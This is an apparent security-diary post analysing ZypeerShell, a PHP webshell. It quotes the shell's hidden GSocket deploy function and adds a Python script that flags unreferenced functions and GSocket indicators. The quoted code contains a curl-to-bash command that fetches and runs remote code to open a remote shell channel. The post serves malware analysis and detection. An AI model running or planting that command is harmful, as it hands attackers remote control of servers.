Webshells Remain Popular

Published: 2026-06-22. Last Updated: 2026-06-22 14:10:27 UTC
by Xavier Mertens (Version: 1)

Webshells have been popular for a long time. We already covered this topic across multiple diaries[1][2]. I spent some time tracking them[3] and then paid slightly less attention to them, but today I found another one. It seems to be a new player (pushed to GitHub two months ago).

The webshell is called ZypeerShell[4] and claims to be "The most powerful, undetectable, and feature-rich PHP webshell available on GitHub." The shell is classic and provides most of the features expected from such a tool.

I won't review all the features because they are classic. In the webshell version I found, some functions were present but never called from the GUI. For example, the function zypeergsdeploy() helps to connect to a C2 server through GSocket:

function zypeergsdeploy() {
    zypeerhead();

    echo '<div class="header"><center><p><div class="txtfont_header">| GSocket Deploy Tool |</div></p></center><br>';

    echo '<div style="text-align:center;max-width:800px;margin:20px auto;color:#ccc;">';
    echo 'This tool runs the official GSocket installation command:<br>';
    echo '<code style="background:#222;padding:8px 12px;font-size:15px;">bash -c "$(curl -fsSL https://gsocket.io/y)"</code><br><br>';
    echo 'After installation, it will show a secret token and connection command (like gs-netcat -s "XXXX" -i).<br>';
    echo 'Click "Run" below to execute it directly.';
    echo '</div><br><hr><br>';

    if (!isset($_POST['zypeer3']) || $_POST['zypeer3'] !== '>>') {
    [...]

This function is never called!
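
One way to triage a recovered PHP file for this pattern, as an added example that is not part of the original diary or of the ZypeerShell code: a static check that lists functions defined but never referenced, and attributes the GSocket strings quoted above to the function they sit in. The sample input is constructed, and demo_info is a hypothetical name.

```python
import re

# Indicator strings taken from the snippet quoted in the diary.
GSOCKET_INDICATORS = ("gsocket.io/y", "gs-netcat")
FUNC_DEF = re.compile(r"\bfunction\s+&?\s*([A-Za-z_][A-Za-z0-9_]*)\s*\(", re.I)

def find_unreferenced_functions(php_source):
    """Names of functions that are defined but never mentioned anywhere else.

    Any other occurrence of the name counts as a reference, even inside a
    string, because PHP can call by name (call_user_func('f'), $f = 'f'; $f()).
    PHP function names are case-insensitive, so matching is done in lower case.
    """
    lowered = php_source.lower()
    unreferenced = []
    for match in FUNC_DEF.finditer(php_source):
        name = match.group(1)
        token = r"(?<![a-z0-9_$])" + re.escape(name.lower()) + r"(?![a-z0-9_])"
        if len(re.findall(token, lowered)) == 1:  # only the definition itself
            unreferenced.append(name)
    return unreferenced

def triage(php_source):
    """Attribute each indicator hit to the closest preceding function definition
    (an approximation of the enclosing function) and say if it is unreferenced."""
    defs = [(m.start(), m.group(1)) for m in FUNC_DEF.finditer(php_source)]
    dead = set(find_unreferenced_functions(php_source))
    findings = []
    for indicator in GSOCKET_INDICATORS:
        for hit in re.finditer(re.escape(indicator), php_source):
            owner = next((n for pos, n in reversed(defs) if pos < hit.start()), None)
            findings.append((indicator, owner, owner in dead))
    return findings

# Constructed sample (not the real webshell); demo_info is a hypothetical name.
SAMPLE = r'''<?php
function zypeerhead() { echo "<html>"; }
function demo_info() { zypeerhead(); echo php_uname(); }
function zypeergsdeploy() {
    zypeerhead();
    echo 'bash -c "$(curl -fsSL https://gsocket.io/y)"';
    echo 'gs-netcat -s "XXXX" -i';
}
$action = 'demo_info';   // called by name: still counts as a reference
$action();
'''

if __name__ == "__main__":
    for indicator, func, hidden in triage(SAMPLE):
        print(f"{indicator!r} in {func}() unreferenced={hidden}")
```

A hit only says the capability ships in the file without being wired to the interface as written; an obfuscated copy has to be unpacked before a static check like this sees anything.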

Note that the GitHub repository contains a version obfuscated with Fortress Layer, a multi-layer loader with integrity checks. Zypeer is also referenced as a red-team tool on a Telegram channel.

[1] https://isc.sans.edu/diary/Webshells+Webshells+everywhere/28106
[2] https://isc.sans.edu/diary/Webshell+looking+for+interesting+files/23567
[3] https://owasp.org/www-chapter-belgium/assets/2017/2017-05-29/2017-05-29_OWASP-BE_HTTPForTheGoodOrTheBad.pdf
[4] https://github.com/sagsooz/ZypeerShell

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant

Keywords: Webshell Zypeer